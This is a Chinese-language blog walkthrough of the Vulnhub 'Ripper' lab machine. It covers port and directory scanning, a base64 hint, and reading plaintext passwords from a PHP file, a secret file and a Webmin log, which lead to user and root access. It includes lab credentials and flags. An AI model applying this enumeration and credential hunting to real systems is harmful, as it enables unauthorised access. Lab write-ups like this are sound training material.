Vulnhub之Ripper靶机详细测试过程

Ripper

识别目标主机IP地址

──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.173.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:81:10:a5      2     120  PCS Systemtechnik GmbH                                                   
 192.168.56.224  08:00:27:72:76:55      2     120  PCS Systemtechnik GmbH                                                   


利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.224

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.224 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-15 20:34 EST
Nmap scan report for bogon (192.168.56.224)
Host is up (0.000064s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09:1a:06:6e:ed:a0:9b:6f:d7:c7:78:83:3a:f7:7a:9c (RSA)
|   256 99:f1:83:7c:15:b9:db:a7:a8:56:96:05:ae:5d:d3:ee (ECDSA)
|_  256 f4:8c:5a:90:99:ea:d6:24:ba:5a:2d:13:e9:ce:68:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:72:76:55 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.94 seconds

NMAP扫描结果表明目标主机有3个开放端口:22(SSH)、80(HTTP)、10000(HTTP)

获得Shell

浏览器访问80端口,返回apache2默认页面,检查robots.txt文件,不存在。接下来做一下目录扫描:

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ gobuster dir -u http://192.168.56.224 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.224
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/15 20:41:33 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
Progress: 220336 / 220561 (99.90%)===============================================================
2022/12/15 20:41:59 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ nikto -h http://192.168.56.224
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.224
+ Target Hostname:    192.168.56.224
+ Target Port:        80
+ Start Time:         2022-12-15 22:29:16 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5c3f2156d5d01, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2022-12-15 22:30:03 (GMT-5) (47 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ dirb http://192.168.56.224       

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Dec 15 22:30:55 2022
URL_BASE: http://192.168.56.224/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.224/ ----
+ http://192.168.56.224/index.html (CODE:200|SIZE:10918)                                                                    
+ http://192.168.56.224/server-status (CODE:403|SIZE:279)                                                                   
                                                                                                                            
-----------------
END_TIME: Thu Dec 15 22:30:57 2022
DOWNLOADED: 4612 - FOUND: 2
                                         

Gobuster工具以及nikto、dirb都没有扫描出任何新的目录,看用gobuster工具扫描一下文件:

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ gobuster dir -u http://192.168.56.224 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.html,.txt    
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.224
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,php,sh,html
[+] Timeout:                 10s
===============================================================
2022/12/15 22:32:22 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10918]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101024 / 1102805 (99.84%)===============================================================
2022/12/15 22:34:56 Finished
===============================================================

gobuster工具也没有扫描出文件,接下来看一下端口:10000

访问10000端口,返回页面中说明:会转向Https,并且有主机名,所以先增加主机记录:

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.224  ripper-min

访问url:

https://ripper-min:10000/

返回用户登录页面。

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ curl -k https://ripper-min:10000/robots.txt     
User-agent: *
Disallow: /
d2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ echo 'd2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==' | base64 -d
we scan php codes with rips

访问rips官网,在其下载与安装部分,我们发现安装完成后,他的路径就是/rips/,我们尝试在80和10000端口访问此目录,找到80端口下存在rips服务

rips页面中可以扫描/var/www下目录的文件是否有漏洞,结果表明有4个文件有漏洞(信息泄露)

其中有个文件./html/rips/secret.php有用户名密码信息:

username: ripper

password:Gamespeopleplay

用该用户名尝试登录10000端口,但是失败,那会不会是ssh用户密码:

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ ssh ripper@192.168.56.224 
The authenticity of host '192.168.56.224 (192.168.56.224)' can't be established.
ED25519 key fingerprint is SHA256:Gz/RqLZwvom5GaG8tBiFtAT9fnNDcbSol7p6Fnfe0G0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.224' (ED25519) to the list of known hosts.
ripper@192.168.56.224's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

276 packages can be updated.
211 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Fri Jun  4 13:26:34 2021 from 10.0.0.154
ripper@ripper-min:~$ id
uid=1000(ripper) gid=1000(ripper) groups=1000(ripper),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
ripper@ripper-min:~$ 

ripper@ripper-min:~$ cat flag.txt 
__________.____________________________________________ 
\______   \   \______   \______   \_   _____/\______   \
 |       _/   ||     ___/|     ___/|    __)_  |       _/
 |    |   \   ||    |    |    |    |        \ |    |   \
 |____|_  /___||____|    |____|   /_______  / |____|_  /
        \/                                \/         \/ 

flag{15ea80f080be3714df1ef97bac5d7151}

C0ngratulation on getting user ! Lets get root now :)
ripper@ripper-min:~$ 

提权

由于作者提示需要拿到所有用户的shell,然后提权到root

ripper@ripper-min:/tmp$ cd /home
ripper@ripper-min:/home$ ls -alh
total 16K
drwxr-xr-x  4 root   root   4.0K Jun  4  2021 .
drwxr-xr-x 24 root   root   4.0K Jun  4  2021 ..
drwxr-xr-x 15 cubes  cubes  4.0K Jun  4  2021 cubes
drwxr-xr-x 16 ripper ripper 4.0K Jun  4  2021 ripper
ripper@ripper-min:/home$ 

也就是说接下来设法拿到cubes的shell

ripper@ripper-min:/home$ cd cubes/
ripper@ripper-min:/home/cubes$ ls -alh
total 92K
drwxr-xr-x 15 cubes cubes 4.0K Jun  4  2021 .
drwxr-xr-x  4 root  root  4.0K Jun  4  2021 ..
-rw-------  1 cubes cubes  384 Jun  4  2021 .bash_history
-rw-r--r--  1 cubes cubes  220 Jun  4  2021 .bash_logout
-rw-r--r--  1 cubes cubes 3.7K Jun  4  2021 .bashrc
drwx------ 10 cubes cubes 4.0K Jun  4  2021 .cache
drwx------ 11 cubes cubes 4.0K Jun  4  2021 .config
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Desktop
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Documents
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Downloads
-rw-r--r--  1 cubes cubes 8.8K Jun  4  2021 examples.desktop
drwx------  3 cubes cubes 4.0K Jun  4  2021 .gnupg
-rw-------  1 cubes cubes  334 Jun  4  2021 .ICEauthority
drwxrwxr-x  3 cubes cubes 4.0K Jun  4  2021 .local
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Music
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Pictures
-rw-r--r--  1 cubes cubes  807 Jun  4  2021 .profile
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Public
drwx------  2 cubes cubes 4.0K Jun  4  2021 .ssh
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Templates
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Videos
ripper@ripper-min:/home/cubes$ cd .ssh
-bash: cd: .ssh: Permission denied
ripper@ripper-min:/home/cubes$ cat .bash_history
cat: .bash_history: Permission denied

cubes的家目录没有权限查看,可用Find命令查看cubes用户相关的文件:

ripper@ripper-min:/home/cubes$ find / -user cubes -type f 2>/dev/null
/home/cubes/.profile
/home/cubes/.bashrc
/home/cubes/.ICEauthority
/home/cubes/examples.desktop
/home/cubes/.bash_logout
/home/cubes/.bash_history
/mnt/secret.file
ripper@ripper-min:/home/cubes$ ls -alh /mnt/secret.file 
-rw-rw-r-- 1 cubes cubes 60 Jun  4  2021 /mnt/secret.file
ripper@ripper-min:/home/cubes$ cat /mnt/secret.file 
This is my secret file

[file system]
-passwd : Il00tpeople
ripper@ripper-min:/home/cubes$ 

ripper@ripper-min:/home/cubes$ su - cubes
Password: 
cubes@ripper-min:~$ id
uid=1001(cubes) gid=1001(cubes) groups=1001(cubes)
cubes@ripper-min:~$ sudo -l
[sudo] password for cubes: 
Sorry, user cubes may not run sudo on ripper-min.
cubes@ripper-min:~$ cd /home/cubes/
cubes@ripper-min:~$ ls -alh
total 92K
drwxr-xr-x 15 cubes cubes 4.0K Jun  4  2021 .
drwxr-xr-x  4 root  root  4.0K Jun  4  2021 ..
-rw-------  1 cubes cubes  384 Jun  4  2021 .bash_history
-rw-r--r--  1 cubes cubes  220 Jun  4  2021 .bash_logout
-rw-r--r--  1 cubes cubes 3.7K Jun  4  2021 .bashrc
drwx------ 10 cubes cubes 4.0K Jun  4  2021 .cache
drwx------ 11 cubes cubes 4.0K Jun  4  2021 .config
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Desktop
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Documents
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Downloads
-rw-r--r--  1 cubes cubes 8.8K Jun  4  2021 examples.desktop
drwx------  3 cubes cubes 4.0K Jun  4  2021 .gnupg
-rw-------  1 cubes cubes  334 Jun  4  2021 .ICEauthority
drwxrwxr-x  3 cubes cubes 4.0K Jun  4  2021 .local
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Music
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Pictures
-rw-r--r--  1 cubes cubes  807 Jun  4  2021 .profile
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Public
drwx------  2 cubes cubes 4.0K Jun  4  2021 .ssh
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Templates
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Videos
cubes@ripper-min:~$ 

cubes@ripper-min:~$ cat .bash_history 
cd /var/
ls
cd webmin/
ks
ls
cd backup/
ls
cd /mnt/
ls -la
nano s.txt
ls
rm s.txt 
nano secret.file
su ripper
sudo apt
su root
cd /var/
ls
cd webmin/
ls
mkdir backup
cd backup/
cd ..
ls
cat miniserv.
cat miniserv.log 
cd modules/
ls
cd ..
ls
cat miniserv.error 
ls
cat blocked 
cp miniserv.error backup/miniser.log
cd backup/
ls
nano miniser.log 
cd /mnt/
ls
nano secret.file
su root
cubes@ripper-min:~$ 

到/var/webadmin目录下看一看:

cubes@ripper-min:/var/webmin$ cd backup
cubes@ripper-min:/var/webmin/backup$ ls -alh
total 12K
drwxrwxr-x+ 2 cubes cubes 4.0K Jun  4  2021 .
drwxrwx---+ 4 root  bin   4.0K Jun  4  2021 ..
-rw-rwx---+ 1 cubes cubes 2.6K Jun  4  2021 miniser.log
cubes@ripper-min:/var/webmin/backup$ cat miniser.log 
[04/Jun/2021:11:21:48 -0400] miniserv.pl started
[04/Jun/2021:11:21:48 -0400] IPv6 support enabled
[04/Jun/2021:11:21:48 -0400] Using MD5 module Digest::MD5
[04/Jun/2021:11:21:48 -0400] Using SHA512 module Crypt::SHA
[04/Jun/2021:11:21:48 -0400] Perl module Authen::PAM needed for PAM is not installed : Can't locate Authen/PAM.pm in @INC (you may need to install the Authen::PAM module) (@INC contains: /root/webmin-1.910 /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.26.1 /usr/local/share/perl/5.26.1 /usr/lib/x86_64-linux-gnu/perl5/5.26 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.26 /usr/share/perl/5.26 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at (eval 15) line 1.
BEGIN failed--compilation aborted at (eval 15) line 1.
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Authentication : session_login.cgi=username=admin&pass=tokiohotel
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Document follows : This web server is running in SSL mode. Try the URL <a href='https://ripper-min:10000/'>https://ripper-min:10000/</a> instead.<br>
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Document follows : This web server is running in SSL mode. Try the URL <a href='https://ripper-min:10000/'>https://ripper-min:10000/</a> instead.<br>
[04/Jun/2021:11:33:29 -0400] Reloading configuration
[04/Jun/2021:11:33:39 -0400] Reloading configuration
Use of uninitialized value in numeric ne (!=) at /root/webmin-1.910/bind8/bind8-lib.pl line 2397.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
cubes@ripper-min:/var/webmin/backup$

在miniser.log中看到了用户名和密码,可能是webmin的:

成功登录管理后台,并且有个web terminal终端功能,直接就拿到了root flag

[admin@ripper-min ~]# id
uid=0(root) gid=0(root) groups=0(root)
[admin@ripper-min root]# ls -alh
total 30M
drwx------   7 root root 4.0K Jun  4  2021 .
drwxr-xr-x  24 root root 4.0K Jun  4  2021 ..
-rw-------   1 root root 1.5K Jun  4  2021 .bash_history
-rw-r--r--   1 root root 3.1K Apr  9  2018 .bashrc
drwx------   2 root root 4.0K Aug  6  2020 .cache
drwx------   3 root root 4.0K Dec 15 23:41 .gnupg
drwxr-xr-x   3 root root 4.0K Jun  4  2021 .local
-rw-r--r--   1 root root  148 Aug 17  2015 .profile
-rw-r--r--   1 root root  170 Jun  4  2021 .wget-hsts
-rw-r--r--   1 root root  252 Jun  4  2021 flag.txt
drwxr-xr-x   6 root root 4.0K Jun  4  2021 snap
drwxr-xr-x 132 root bin   12K Jun  4  2021 webmin-1.910
-rw-r--r--   1 root root  30M May  9  2019 webmin.tar.gz
[admin@ripper-min root]# cat flag.txt
.---..-.-.-..-..-..--.     .---. .-..---..---..---..---. 
| |-'| | | || .` || \ \### | |-< | || |-'| |-'| |- | |-< 
`-'  `-----'`-'`-'`-'-'    `-'`-'`-'`-'  `-'  `---'`-'`-'

COngrats !!! You have rooted this box !!

Follow me on twitter @san3ncrypt3d

[admin@ripper-min root]#  

posted @ 2022-12-16 12:54  Jason_huawen  阅读(135)  评论(0编辑  收藏  举报